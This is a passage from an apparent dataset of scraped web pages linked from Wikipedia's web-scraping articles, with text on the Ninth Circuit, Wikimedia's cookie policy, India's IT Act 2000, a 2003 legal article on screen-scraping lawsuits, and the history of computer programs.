cases it accepted to review, the Supreme Court reversed around 79% of the cases from the Ninth Circuit, ranking its reversal rate third among the circuits; the median reversal rate for all federal circuits for the same time period was around 70 percent. 9 Some argue the court's high percentage of reversals is illusory, resulting from the circuit hearing more cases than the other circuits. This results in the Supreme Court reviewing a smaller proportion of its cases, letting stand the vast majority of its cases. 10 11 However, a detailed study in 2018 reported by Brian T. Fitzpatrick, a law professor at Vanderbilt University, looked at how often a federal circuit court was reversed for every thousand cases it terminated on the merits between 1994 and 2015. 12 The study found that the Ninth Circuit's decisions were reversed at a rate of 2.50 cases per thousand, which was by far the highest rate in the country, with the Sixth Circuit second as 1.73 cases per thousand. 13 12 Fitzpatrick also noted that the 9th Circuit was unanimously reversed more than three times as often as the least reversed circuits and over 20% more often than the next closest circuit. 12 Many commentators have argued that the Ninth Circuit faces several adverse consequences of its large size, 14 such as "unwieldly size, procedural inefficiencies, jurisprudential unpredictability, and unusual en banc process. 15 Chief among these is the Ninth Circuit's unique rules concerning the composition of an en banc court. In other circuits, en banc courts are composed of all active circuit judges, plus (depending on the rules of the particular court) any senior judges who took part in the original panel decision. By contrast, in the Ninth Circuit it is impractical for 29 or more judges to take part in a single oral argument and deliberate on a decision en masse. The court thus provides for a limited en banc review by the Chief Judge and a panel of 10 randomly selected judges. 16 This means that en banc reviews may not actually reflect the views of the majority of the court and indeed may not include any of the three judges involved in the decision being reviewed in the first place. The result, according to detractors, is a high risk of intracircuit conflicts of law where different groupings of judges end up delivering contradictory opinions. That is said to cause uncertainty in the district courts and within the bar. However, en banc review is a relatively rare occurrence in all circuits and Ninth Circuit rules provide for full en banc review in limited circumstances. 17 All recently proposed splits would leave at least one circuit with 21 judges, only two fewer than the 23 that the Ninth Circuit had when the limited en banc procedure was first adopted. In other words, after a split at least one of the circuits would still be using limited en banc courts. 18 In March 2007, Associate Justices Anthony Kennedy and Clarence Thomas testified before a House Appropriations subcommittee that the consensus among the justices of the Supreme Court of the United States was that the Ninth Circuit was too large and unwieldy and should be split. 19 Congressional officials, legislative commissions, and interest groups have all submitted proposals to divide the Ninth Circuit such as: The more recent proposals have aimed to redefine the Ninth Circuit to cover California, Hawaii, Guam, and the Northern Mariana Islands, and to create a new Twelfth Circuit to cover Alaska, Arizona, Idaho, Montana, Nevada, Oregon, and Washington. As of November 15, 2023 update : Chief judges have administrative responsibilities with respect to their circuits, and preside over any panel on which they serve, unless the circuit justice (the Supreme Court justice responsible for the circuit) is also on the panel. Unlike the Supreme Court, where one justice is specifically nominated to be chief, the office of chief judge rotates among the circuit judges. To be chief, a judge must have been in active service on the court for at least one year, be under the age of 65, and have not previously served as chief judge. A vacancy is filled by the judge highest in seniority among the group of qualified judges, with seniority determined first by commission date, then by age. The chief judge serves for a term of seven years, or until age 70, whichever occurs first. If no judge qualifies to be chief, the youngest judge over the age of 65 who has served on the court for at least one year shall act as chief until another judge qualifies. If no judge has served on the court for more than a year, the most senior judge shall act as chief. Judges can forfeit or resign their chief judgeship or acting chief judgeship while retaining their active status as a circuit judge. 27 When the office was created in 1948, the chief judge was the longest-serving judge who had not elected to retire, on what has since 1958 been known as senior status, or declined to serve as chief judge. After August 6, 1959, judges could not become or remain chief after turning 70 years old. The current rules have been in operation since October 1, 1982. 28 The court has 29 seats for active judges, numbered in the order in which they were initially filled. Judges who assume senior status enter a kind of retirement in which they remain on the bench but vacate their seats, thus allowing the U.S. President to appoint new judges to fill their seats. |
284 | https://en.wikipedia.org/wiki/Web_scraping | https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Cookie_statement | It may not be circumvented, eroded, or ignored by Wikimedia Foundation officers or staff nor local policies of any Wikimedia project. As stated in our Privacy Policy, Wikimedia believes strongly in the values of privacy and transparency. To that end, we have created this Cookie Statement as a clear reference guide to the use of cookies on Wikimedia Sites. This Cookie Statement explains how we use cookies (and other locally stored data technologies), how we use third-party cookies, and how you can manage your cookie options. For more information on our privacy practices, please visit our Privacy Policy. The Wikimedia Foundation, the non-profit organization that hosts the Wikimedia Sites, actively collects some types of information with a variety of commonly-used technologies. These generally include tracking pixels, JavaScript, and a variety of "locally stored data" technologies, such as cookies and local storage. A "cookie" is a tiny data file that we transfer onto your computer, mobile phone, or any other device that you use to access the Wikimedia Sites, and is generally used for authentication and tracking. Every cookie expires after a certain period of time, but that period varies depending on what the cookie is used for and how your browser is configured. Cookies are often categorized based on how long they remain active before they expire. A "session" cookie is one that generally expires when you close your web browser or mobile application. A "persistent" cookie is one that remains in your device, even after you close your browser or mobile application. A persistent cookie expires according to the duration set by us, or when you delete it manually. You can learn more about cookies on Wikipedia. You may remove or disable cookies through your browser settings. For more information on how to manage your cookie options, please see Section 3 of this Cookie Statement below. For more information on this and other key terms that may be relevant, please read through our Privacy Policy Glossary. Cookies are not required in order to read or edit the Wikimedia Sites. We use the information we receive from cookies and other locally stored data technologies to make your experience with the Wikimedia Sites safer and better, to gain a greater understanding of user preferences and interactions with the Wikimedia Sites, and to generally improve our services. Cookies are required in order to login and for your edits to be associated to a user account; without cookies, your edits will be anonymous and unassociated with an account. We use cookies, JavaScript, tracking pixels, and other locally stored data technologies to accomplish different purposes. Below is a list of the categories of cookies we use and what they are used for. Functionality: These cookies help the Wikimedia Sites work and are essential in order to enable you to move around the Wikimedia site and use their features. These cookies are useful for remembering your username in the login field, maintaining your session and remembering previous actions, keeping you logged in (if selected), and more. Here are a few examples: wgCookiePrefix Token This affects the threshold for how many unsuccessful login attempts trigger a notification to the user. wgCookiePrefix Session Preferences: These cookies store your preferences, so that they can be remembered the next time you use the Wikimedia Sites, for a more customized experience. These cookies are useful for recognizing and maintaining your language preference, remembering changes you have made to text size, fonts and other display preferences, so we can provide you with the look and feel that you want, and more. Here are a few examples: where watchlistMessageld is the Id of the message being hidden Performance and Analysis: These cookies count the number of visitors and collect information about how you use the Wikimedia Sites. This allows us to better understand your user experience on the Wikimedia Sites and helps us improve them for you and other users — for instance, by making sure users are finding what they need easily. Other examples include: Here are a few examples: Third-Party: We will never use third-party cookies on our wikis unless we get your permission to do so. These cookies would allow us to render services provided by third parties, such as "like" and "share" buttons. When a third party provides these kinds of services, they may require the use of a cookie in order to provide their services. If you ever come across a third-party cookie transferred to your device during your access of the Wikimedia wiki sites, where you did not take any action to authorize the use and or transfer of that cookie (such as one that may have been mistakenly placed by another user or administrator), please report that cookie to us at privacywikimedia.org. A note about Wikimedia Foundation non-wiki sites: Some non-wiki Wikimedia Foundation sites are hosted by a third-party service provider. Sites hosted by WordPress VIP may have the WordPress Stats module enabled. Stats is a service that allows us to understand how many visitors we get to our WordPress-hosted non-wiki sites, their location by country, and which pages, posts and links are the most popular. Only the Wikimedia Foundation and the service provider, Automattic WordPress, have access to the raw Stats data, which is retained for a maximum of 30 days. For more information about Stats, see WordPress' support page on the module. Sites hosted by Civilized Discourse Construction Kit, Inc., known as Discourse forums, use cookies for functionality purposes and to store preferences. Only the Wikimedia Foundation and the service provider have access to the raw data. For more information about the cookies and their retention periods, see Discourse's information about cookies. Please note that the Wikimedia Foundation has not configured its Discourse forums to use Google Analytics, serve advertisements, or process donations; Discourse cookies related to those purposes are not used in our Sites. While this is not a comprehensive list, below are some of the things that you can do to limit use of cookies and other locally stored data technologies on your device. While cookies and other locally stored data technologies may not be necessary to use our sites, some features may not function properly if you disable them. You can: Turning off the browser's cookies will prevent tracking pixels from tracking your specific activity. A tracking pixel may still record an anonymous visit from your IP address, but unique information will not be recorded. If you do not want to receive tracking pixels, you will need to disable HTML images in your browser-based email client, and that may affect your ability to view images in other emails that you receive. Please read through our Privacy Policy for more information. If you have any further questions, contact privacywikimedia.org. Thanks Please note that in the event of any differences in meaning or interpretation between the original English version of this content and a translation, the original English version takes precedence. |
285 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Information_Technology_Act,_2000#:~:text=From_Wikipedia,_the_free_encyclopedia_The_Information_Technology,in_India_dealing_with_cybercrime_and_electronic_commerce. | The Information Technology Act, 2000 (also known as ITA 2000, or the IT Act) is an Act of the Indian Parliament (No 21 of 2000) notified on 17 October 2000. It is the primary law in India dealing with cybercrime and electronic commerce. Secondary or subordinate legislation to the IT Act includes the Intermediary Guidelines Rules 2011 and the Information Technology (Intermediary Guidelines and Digital Media Ethics Code) Rules, 2021. The bill was passed in the budget session of 2000 and signed by President K. R. Narayanan on 9 May 2000. The bill was finalised by a group of officials headed by the then Minister of Information Technology, Pramod Mahajan. 1 The original Act contained 94 sections, divided into 13 chapters and 4 schedules, out of which the third and fourth schedule were omitted later. The law applies to the whole of India. If a crime involves a computer or network located in India, persons of other nationalities can also be indicted under the law. 2 The Act provides a legal framework for electronic governance by giving recognition to electronic records and digital signatures. It also defines cyber crimes and prescribes penalties for them. The Act directed the formation of a Controller of Certifying Authorities to regulate the issuance of digital signatures. It also established a Cyber Appellate Tribunal to resolve disputes rising from this new law. 2 The Act also amended various sections of the Indian Penal Code, 1860, the Indian Evidence Act, 1872, the Banker's Books Evidence Act, 1891, and the Reserve Bank of India Act, 1934 to make them compliant with new technologies. 2 A major amendment was made in 2008. It introduced Section 66A which penalized sending "offensive messages". It also introduced Section 69, which gave authorities the power of "interception or monitoring or decryption of any information through any computer resource". Additionally, it introduced provisions addressing pornography, child porn, cyber terrorism and voyeurism. The amendment was passed on 22 December 2008 without any debate in Lok Sabha. The next day, it was passed by the Rajya Sabha. It was signed into law by the then President Pratibha Patil, on 5 February 2009. 3 4 5 6 Following is a list of offences and the corresponding penalties under the 2000 Act: 7 8 From its establishment as an amendment to the original act in 2008, Section 66A attracted controversy over its unconstitutional nature: In December 2012, P Rajeev, a Rajya Sabha member from Kerala, tried to pass a resolution seeking to amend Section 66A. He was supported by D. Bandyopadhyay, Gyan Prakash Pilania, Basavaraj Patil Sedam, Narendra Kumar Kashyap, Rama Chandra Khuntia and Baishnab Charan Parida. P Rajeev pointed out that the cartoons and editorials allowed in the traditional media were being censored in the new media. He also said that the law was barely debated before being passed in December 2008. 27 Rajeev Chandrasekhar suggested that 66A should only apply to person-to-person communication pointing to a similar section under the Indian Post Office Act, 1898. Shantaram Naik opposed any changes, saying that the misuse of law was insufficient to warrant changes. The then Minister for Communications and Information Technology, Mr Kapil Sibal, defended the existing law, saying that similar laws existed in the US and the UK. He also said that a similar provision existed under the Indian Post Office Act, 1898. However, P Rajeev said that the UK law dealt only with communication from person to person. 27 In November 2012, IPS officer Amitabh Thakur and his wife, social activist Nutan Thakur, filed a petition in the Lucknow bench of the Allahabad High Court claiming that Section 66A violated the freedom of speech guaranteed under Article 19(1)(a) of the Constitution of India. They said that the section was vaguely worded and frequently misused. 28 Also in November 2012, a Delhi-based law student, Shreya Singhal, filed a Public Interest Litigation (PIL) in the Supreme Court of India. She argued that Section 66A was vaguely phrased, and as a result, it violated Article 14, 19 (1)(a) and Article 21 of the Constitution. The PIL was accepted on 29 November 2012. 29 30 In August 2014, the Supreme Court asked the central government to respond to petitions filed by the Internet and Mobile Association of India (IAMAI) which claimed that the IT Act gave the government power to arbitrarily remove user-generated content. 31 On 24 March 2015, the Supreme Court of India gave the verdict that Section 66A is unconstitutional in entirety. 32 The court said that Section 66A of IT Act 2000 "arbitrarily, excessively and disproportionately invades the right of free speech" provided under Article 19(1) of the Constitution of India. But the Court turned down a plea to strike down sections 69A and 79 of the Act, which deal with the procedure and safeguards for blocking certain websites. 33 34 Despite this, as per a research paper by Abhinav Sekhri and Apar Gupta, Section 66A of the Information Technology Act 2000 continues to be used by police departments across India in prosecutions. 35 The data privacy rules introduced in the Act in 2011 have been described as too strict by some Indian and US firms. The rules require firms to obtain written permission from customers before collecting and using their personal data. This has affected US firms which outsource to Indian companies. However, some companies have welcomed the strict rules, saying it will remove fears of outsourcing to Indian companies. 36 Section 69 allows intercepting any information and ask for information decryption. To refuse decryption is an offence. The Indian Telegraph Act, 1885 allows the government to tap phones. But according to a 1996 Supreme Court verdict, the government can tap phones only in case of a "public emergency". But there is no such restriction on Section 69. 4 On 20 December 2018, the Ministry of Home Affairs cited Section 69 in the issue of an order authorising ten central agencies to intercept, monitor, and decrypt “any information generated, transmitted, received or stored in any computer. 37 While some claim this to be a violation of the fundamental right to privacy, the Ministry of Home Affairs has claimed its validity on the grounds of national security. 38 39 The bans on Chinese apps based on Section 69A has been criticized for possibly being in conflict with Article 19(1)(a) of the Constitution of India ensuring freedom of speech and expression to all, as well as possibly in conflict with WTO agreements. 40 41 The Internet Freedom Foundation has criticized the ban for not following the required protocols and thus lacking transparency and disclosure. 42 On 2 April 2015, the then Chief Minister of Maharashtra, Devendra Fadnavis revealed to the state assembly that a new law was being framed to replace the repealed Section 66A. Fadnavis was replying to a query by Shiv Sena leader Neelam Gorhe. Gorhe had said that the repeal of the law would encourage online miscreants and asked whether the state government would frame a law in this regard. Fadnavis said that the previous law had resulted in no convictions, so the law would be framed such that it would be strong and result in convictions. 43 On 13 April 2015, it was announced that the Ministry of Home Affairs would form a committee of officials from the Intelligence Bureau, Central Bureau of Investigation, National Investigation Agency, Delhi Police and the ministry itself to produce a new legal framework. This step was reportedly taken after complaints from intelligence agencies that they were no longer able to counter online posts that involved national security matter or incited people to commit an offence, such as online recruitment for ISIS. 44 45 Former Minister of State with the Ministry of Information Technology, Milind Deora has supported a new "unambiguous section to replace 66A". 46 In 2022, it was reported 47 that there has been a proposal to replace the Information Technology Act with a more comprehensive and updated Digital India Act, which would cover a wider range of information technology issues and concerns. This law could ostensibly have focal areas around privacy, social media regulation, regulation of over-the-top platforms, internet intermediaries, introducing additional contraventions or offences, and governance of new technologies. 48 The Indian government closely connects data to citizens' privacy and this is demonstrated when Shiv Shankar Singh states, "Each person must be able to exercise a substantial degree of control over that data and its use. Data protection is legal safeguard to prevent misuse of information about individual person on a medium including computers. 49 The Information Technology (Intermediary Guidelines and Digital Media Ethics Code) Rules, 2021 suppresses India's Intermediary Guidelines Rules 2011. 50 |
286 | https://en.wikipedia.org/wiki/Web_scraping | https://web.archive.org/web/20110211123854/http://library.findlaw.com/2003/Jul/29/132944.html | By Kenneth A. Adler The courts continue to wrestle with how to map existing law onto the shifting terrain of computer technology. And, it appears that new controversies are arising faster than judicial consensus can form. One of the latest controversies surrounds "screen scraping, a process by which a software program simulates a user’s interaction with a Web site to access information stored on that site. A screen scraper can not only enter the information a human user would; it can also capture the Web site’s replies. This facility may include the ability to extract substantial portions of data stored on the site — and therein lies the beginning of the controversy. Many users welcome scrapers. Scrapers can permit a user to enter once certain information, such as usernames and passwords, and with the push of a button, send the scraper software off to access various third- party Web sites to which the user subscribes, automatically input the appropriate information and retrieve the desired information from those sites. This relieves the user from having to endure the tedium of individually accessing each Web site, and manually and serially entering in repetitive information. Controversy arises, however, when commercial entities use scraping software to collect substantial amounts of information from their competitors’ Web sites, even when the information is provided to the public and is readily obtainable by manual means by individual inquiry. Several courts have addressed a company’s use of related technologies such as "spiders, "robots" and "Web crawlers" to gather information from a competitor’s Web site. Notably, many of these decisions have relied upon the law of trespass in determining whether such access is actionable. Compare, e.g., Ticketmaster Corp. v. Tickets.Com, Inc., 2000 U.S. Dist. LEXIS 12987, 18 (C.D.Calif. Aug. 10, 2000), aff’d 248 F.3d 1173 (9th Cir. 2001) (finding that a trespass claim based upon Web crawling had "some merit" but not enough to justify the issuance of a preliminary injunction), with eBay, Inc. v. Bidder’s Edge, Inc., 100 F.Supp.2d 1058 (N.D. Calif. 2000) (finding that a Web crawler’s generation of 80,000 to 100,000 requests a day to a Web site constituted a trespass to chattels) and Oyster Software v. Forms Processing, 2001 U.S. Dist. LEXIS 22520 (N.D. Calif. Dec. 6, 2001) (although Web crawlers placed only a "negligible" load on a Web site’s servers, no more than mere "use" of a plaintiff ’s computer system was necessary to establish a trespass claim). Two recent decisions, one in the U.S. Court of Appeals for the First Circuit and another in a trial court in Texas, squarely address claims against screen scraping activity. However, the issue is presented under different legal theories in each case. The First Circuit analyzes screen scraping under the Computer Fraud and Abuse Act (CFAA), 18 U.S.C. 1030 (2000), while the Texas court, like those in the cases cited above, rests its decision on the law of trespass. Computer Fraud and Abuse Act The first of these recent screen scraping decisions is that of the First Circuit in EF Cultural Travel BV v. Zefer Corp., 318 F.3d 58 (1st Cir. Jan. 28, 2003) (EF II). (The court’s earlier treatment of the subject appears in the related case, EF Cultural Travel BV v. Explorica, Inc., 274 F.3d 577 (1st Cir., Dec. 17, 2001) or EF I, as discussed below. The facts underlying both EF cases involve a dispute between EF Cultural Travel (EF) and defendant Explorica, Inc., competitors in the student travel industry. Importantly, Explorica was founded by several of EF’s former employees. Explorica contracted with Zefer Corporation to design and code a software program that would scrape EF’s pricing information from the EF Web site and download it into an automated spreadsheet. Based on this information, Explorica set off to compete with EF by setting its own prices, on average, 5 percent lower. Altogether, Zefer ran the scraper twice (comprising more than 30,000 interrogations of the EF Web site), to collect 2000 and 2001 tour prices, collecting approximately 60,000 lines of data. EF sued Zefer and Explorica in federal court, seeking a preliminary injunction on the grounds of copyright infringement and under the Computer Fraud and Abuse Act. The district court refused to grant summary judgment on the copyright claim, but issued a preliminary injunction on the basis of the CFAA, because the scraper software exceeded the "reasonable expectations" of authorized access of ordinary users of the EF Web site. The district court reasoned that the scraping activities exceeded the defendants’ authorized use of the EF Web site because "access was facilitated by use of confidential information about certain codes used on the EF Web site that would permit the screen scraper to function more effectively obtained in violation of the broad confidentiality agreement signed by EF’s former employees. Specifically, the district court relied on 18 U.S.C. 1030(a)(4) which provides: "Exceeds authorized access, as defined by the CFAA, means "to access a computer with authorization and to use such access to obtain or alter information in the computer that the accessing party is not entitled so to obtain or alter. 18 U.S.C. 1030(e)(6). The district court concluded that a lack of authorization need not be explicit, and observed that EF’s Web site included not fewer than three warnings that should have put the defendants on notice about reasonable use of the EF Web site — the copyright notice on the EF home page with a link provided to permit contacting the company with user questions; the provision of confidential codes by Explorica to Zefer; and the fact that the Web site functioned to permit typical users to display the information one page at a time. On appeal, the First Circuit, in its first decision in the case (274 F.3d 577, EF II) addressed only the preliminary injunction as it applied to Explorica (Zefer was by then in bankruptcy proceedings, and its appeal was automatically stayed). The court relied on the broad confidentiality agreement between the former EF employees who now operated Explorica to conclude that their breach of the agreement exceeded "authorized access. Further, the court rejected Explorica’s contention that EF should not be permitted to sustain its private cause of action because EF could not demonstrate that Explorica’s actions had caused the "damage or loss" required by the CFAA. The court agreed that EF could not meet the CFAA’s standard for "damage, i.e., "impairment to the integrity or availability of data, a program, a system or information that…causes loss aggregating at least $5,000 in value during any one year period to one or more individuals… 18 U.S.C. 1030(e)(8). However, the court concluded that EF had sustained possibly compensable "losses. Although "loss" is not defined by the statute, the court noted that a reasonable definition of "loss" could include lost business, loss of goodwill, and the cost of diagnostic and remedial measures taken by EF after it discovered the scraping. The court held that EF unquestionably suffered a detriment and a disadvantage…. Congress’ use of the disjunctive damage or loss, confirms that it anticipated recovery in cases involving other than purely physical damage. The appeals court in EF I concluded that EF would likely succeed on the merits on its CFAA claim, and upheld the district court’s injunction. The court did not, however, address related arguments concerning whether mere use of scraper software constituted unauthorized access under the statute. Upon lifting of the automatic stay resulting from its bankruptcy proceedings, Zefer appealed the validity of the injunction as applied to it. The First Circuit, after reviewing the findings of its earlier decision, noted that the evidence before it concerning Zefer’s knowledge of the confidential nature of the information provided by Explorica was inconclusive and that, in any event, the same information could have been obtained by Zefer through a manual examination of the EF Web site. The court focused once more on whether the use of the scraper software had exceeded authorized access under the CFAA. However, the court rejected the district court’s "reasonable expectations" standard for determining what conduct constituted "unauthorized access" under the CFAA where no express limits on access exist. Instead, the court observed, …we think that the public website provider can easily spell out explicitly what is forbidden and, consonantly, that nothing justifies putting users at the mercy of a highly imprecise, litigationspawning standard like reasonable expectations. If EF wants to ban scrapers, let it say so…. The court concluded with some cogent advice for Web site operators: W ith rare exceptions, public website providers ought to say just what nonpassword protected access they purport to forbid. The opinion strongly suggests, although it does not hold, that a clear statement by a Web site provider that scraping is unauthorized will give rise to a cause of action under the CFAA. Trespass In contrast with the approach taken by the First Circuit in the EF decisions, a recent Texas court relied on a finding of NEW YORK LAW JOURNAL MONDAY, JUNE 9, 2003 trespass in issuing a temporary injunction against screen scraping by a commercial party. Like the First Circuit, the Texas court focused on the existence of Web site terms and conditions, but in this case prohibited such use. In American Airlines, Inc. v. Farechase, Inc., No. 167 194022 02 (67th District Court, Texas March 8, 2003) the district court issued a temporary injunction against Farechase, Inc. (Farechase) prohibiting it from the sale or distribution of its Web automation software. (A copy of the injunction is available at http: www.eff.org Cases AA v Farechase 20030310 prelim inj.pdf.) The software, also a type of screen scraper, was designed to access American Airlines’ Web site (AA.com), and automatically seek out and aggregate American Airlines’ flight, seat availability and pricing information, including fares available only through AA.com and not generally available for commercial purposes. Farechase had marketed the software to commercial users, travel distribution centers and travel agents. American Airlines (AA) repeatedly notified Farechase to cease and desist from scraping AA.com and distributing software designed to access and scrape data from AA.com. In response, rather than ceasing its scraping activities, Farechase revised its software to include a "masking" feature that permitted the software to disguise itself to prevent detection by AA. AA argued that Farechase violated AA.com’s terms of services by accessing the fare and flight information for commercial purposes, thus, as the court noted, "frustrating American’s objectives and efforts in developing and maintaining AA.com. The court classified Farechase’s actions as "intentional, "without authorization" and interfering with AA’s possessory interest in its computer system. The court concluded, "Farechase’s conduct intermeddles with and interferes with American’s personal property. Such conduct constitutes a trespass" that substantially interfered with the airline’s "efforts to reduce the cost of distribution of its airline tickets. Interestingly, the court also found that the unauthorized access "may be a violation" of 33.02 of the Texas Penal Code (criminalizing a breach of computer security). In its decision, the court held that Farechase’s actions had directly harmed AA, causing it to endure losses with respect to the capacity and operation of its computer systems, lost or reduced customer goodwill and lost opportunities for gaining and increasing customer goodwill through the reduced fares available via the AA.com site. In addition, the court found that Farechase’s scraping activities increased AA’s expenses and "adversely affect ed and harm ed American and the condition, quality and value of American’s property. Finally, the court observed, Farechase had announced plans for wider distribution of the software, which the court said "imminently threatens to adversely impact and harm the performance of AA.com and to place additional burdens on American’s website infrastructure. Based on its findings, the courts enjoined Farechase from its scraping activities. Sufficient Notice Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial Web sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled, and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the Web site owner’s system and the types and manner of prohibitions on such conduct. While the law in this area becomes more settled, entities contemplating using scraping programs to access a public Web site should consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. Owners of Web sites should consider adding or revising appropriate terms of use to their sites while clearly specifying how their Web site content can be displayed, accessed and used by site visitors, as well as any prohibitions on such access and use. However, it is important to note that merely adding prohibitive language to a Web site’s terms of use in and of itself may be insufficient. In Specht v. Netscape Communications Corporation, Inc., 306 F.3d 17 (2d Cir. Oct. 1, 2002), the U.S. Court of Appeals for the Second Circuit refused to enforce an arbitration provision inserted in the end user license agreement for a free software "plug-in. Because no "immediately visible notice of the existence of the license terms" was displayed prior to the downloading or during the software installation process, the court found that "a reference to the existence of the license terms on a submerged screen wa s not sufficient to place consumers on inquiry or constructive notice of those terms. Therefore, the court reasoned, simply downloading the software could not constitute acceptance of the license terms. As such, merely providing access to the terms of use may not provide sufficient notice to users to be binding upon them. Therefore, it would be prudent for Web site owners wanting to bind its users to terms of use to either require assent by use of a click wrap requiring a click-through of an "I Agree" button or other means to ensure that the terms of use and modifications to such terms are available to the user prior to use, and are conspicuously placed on the site. Donald R. Ballman, an associate in the firm’s Hartford, Conn., office, assisted in the preparation of this article. This article is reprinted with permission from the June 9, 2003 edition of the NEW YORK LAW JOURNAL. 2003 ALM Properties, Inc. All rights reserved. Further duplication without permission is prohibited. For information contact, American Lawyer Media, Reprint Department at 800 888 8300 x6111. 070 06 03 0009 |
287 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Computer_program | A computer program is a sequence or set a of instructions in a programming language for a computer to execute. It is one component of software, which also includes documentation and other intangible components. 1 A computer program in its human-readable form is called source code. Source code needs another computer program to execute because computers can only execute their native machine instructions. Therefore, source code may be translated to machine instructions using a compiler written for the language. (Assembly language programs are translated using an assembler.) The resulting file is called an executable. Alternatively, source code may execute within an interpreter written for the language. 2 If the executable is requested for execution, then the operating system loads it into memory and starts a process. 3 The central processing unit will soon switch to this process so it can fetch, decode, and then execute each machine instruction. 4 If the source code is requested for execution, then the operating system loads the corresponding interpreter into memory and starts a process. The interpreter then loads the source code into memory to translate and execute each statement. Running the source code is slower than running an executable. 5 b Moreover, the interpreter must be installed on the computer. The "Hello, World program is used to illustrate a language's basic syntax. The syntax of the language BASIC (1964) was intentionally limited to make the language easy to learn. 6 For example, variables are not declared before being used. 7 Also, variables are automatically initialized to zero. 7 Here is an example computer program, in Basic, to average a list of numbers: 8 Once the mechanics of basic computer programming are learned, more sophisticated and powerful languages are available to build large computer systems. 9 Improvements in software development are the result of improvements in computer hardware. At each stage in hardware's history, the task of computer programming changed dramatically. In 1837, Jacquard's loom inspired Charles Babbage to attempt to build the Analytical Engine. 10 The names of the components of the calculating device were borrowed from the textile industry. In the textile industry, yarn was brought from the store to be milled. The device had a store which consisted of memory to hold 1,000 numbers of 50 decimal digits each. 11 Numbers from the store were transferred to the mill for processing. It was programmed using two sets of perforated cards. One set directed the operation and the other set inputted the variables. 10 12 However, the thousands of cogged wheels and gears never fully worked together. 13 Ada Lovelace worked for Charles Babbage to create a description of the Analytical Engine (1843). 14 The description contained Note G which completely detailed a method for calculating Bernoulli numbers using the Analytical Engine. This note is recognized by some historians as the world's first computer program. 13 In 1936, Alan Turing introduced the Universal Turing machine, a theoretical device that can model every computation. 15 It is a finite-state machine that has an infinitely long read write tape. The machine can move the tape back and forth, changing its contents as it performs an algorithm. The machine starts in the initial state, goes through a sequence of steps, and halts when it encounters the halt state. 16 All present-day computers are Turing complete. 17 The Electronic Numerical Integrator And Computer (ENIAC) was built between July 1943 and Fall 1945. It was a Turing complete, general-purpose computer that used 17,468 vacuum tubes to create the circuits. At its core, it was a series of Pascalines wired together. 18 Its 40 units weighed 30 tons, occupied 1,800 square feet (167 m2), and consumed $650 per hour (in 1940s currency) in electricity when idle. 18 It had 20 base 10 accumulators. Programming the ENIAC took up to two months. 18 Three function tables were on wheels and needed to be rolled to fixed function panels. Function tables were connected to function panels by plugging heavy black cables into plugboards. Each function table had 728 rotating knobs. Programming the ENIAC also involved setting some of the 3,000 switches. Debugging a program took a week. 19 It ran from 1947 until 1955 at Aberdeen Proving Ground, calculating hydrogen bomb parameters, predicting weather patterns, and producing firing tables to aim artillery guns. 20 Instead of plugging in cords and turning switches, a stored-program computer loads its instructions into memory just like it loads its data into memory. 21 As a result, the computer could be programmed quickly and perform calculations at very fast speeds. 22 Presper Eckert and John Mauchly built the ENIAC. The two engineers introduced the stored-program concept in a three-page memo dated February 1944. 23 Later, in September 1944, John von Neumann began working on the ENIAC project. On June 30, 1945, von Neumann published the First Draft of a Report on the EDVAC, which equated the structures of the computer with the structures of the human brain. 22 The design became known as the von Neumann architecture. The architecture was simultaneously deployed in the constructions of the EDVAC and EDSAC computers in 1949. 24 The IBM System 360 (1964) was a family of computers, each having the same instruction set architecture. The Model 20 was the smallest and least expensive. Customers could upgrade and retain the same application software. 25 The Model 195 was the most premium. Each System 360 model featured multiprogramming 25 —having multiple processes in memory at once. When one process was waiting for input output, another could compute. IBM planned for each model to be programmed using PL 1. 26 A committee was formed that included COBOL, Fortran and ALGOL programmers. The purpose was to develop a language that was comprehensive, easy to use, extendible, and would replace Cobol and Fortran. 26 The result was a large and complex language that took a long time to compile. 27 Computers manufactured until the 1970s had front-panel switches for manual programming. 28 The computer program was written on paper for reference. An instruction was represented by a configuration of on off settings. After setting the configuration, an execute button was pressed. This process was then repeated. Computer programs also were automatically inputted via paper tape, punched cards or magnetic-tape. After the medium was loaded, the starting address was set via switches, and the execute button was pressed. 28 A major milestone in software development was the invention of the Very Large Scale Integration (VLSI) circuit (1964). 29 Following World War II, tube-based technology was replaced with point-contact transistors (1947) and bipolar junction transistors (late 1950s) mounted on a circuit board. 29 During the 1960s, the aerospace industry replaced the circuit board with an integrated circuit chip. 29 Robert Noyce, co-founder of Fairchild Semiconductor (1957) and Intel (1968), achieved a technological improvement to refine the production of field-effect transistors (1963). 30 The goal is to alter the electrical resistivity and conductivity of a semiconductor junction. First, naturally occurring silicate minerals are converted into polysilicon rods using the Siemens process. 31 The Czochralski process then converts the rods into a monocrystalline silicon, boule crystal. 32 The crystal is then thinly sliced to form a wafer substrate. The planar process of photolithography then integrates unipolar transistors, capacitors, diodes, and resistors onto the wafer to build a matrix of metal oxide semiconductor (MOS) transistors. 33 34 The MOS transistor is the primary component in integrated circuit chips. 30 Originally, integrated circuit chips had their function set during manufacturing. During the 1960s, controlling the electrical flow migrated to programming a matrix of read-only memory (ROM). The matrix resembled a two-dimensional array of fuses. 29 The process to embed instructions onto the matrix was to burn out the unneeded connections. 29 There were so many connections, firmware programmers wrote a computer program on another chip to oversee the burning. 29 The technology became known as Programmable ROM. In 1971, Intel installed the computer program onto the chip and named it the Intel 4004 microprocessor. 35 The terms microprocessor and central processing unit (CPU) are now used interchangeably. However, CPUs predate microprocessors. For example, the IBM System 360 (1964) had a CPU made from circuit boards containing discrete components on ceramic substrates. 36 The Intel 4004 (1971) was a 4 bit microprocessor designed to run the Busicom calculator. Five months after its release, Intel released the Intel 8008, an 8 bit microprocessor. Bill Pentz led a team at Sacramento State to build the first microcomputer using the Intel 8008: the Sac State 8008 (1972). 37 Its purpose was to store patient medical records. The computer supported a disk operating system to run a Memorex, 3 megabyte, hard disk drive. 29 It had a color display and keyboard that was packaged in a single console. The disk operating system was programmed using IBM's Basic Assembly Language (BAL). The medical records application was programmed using a BASIC interpreter. 29 However, 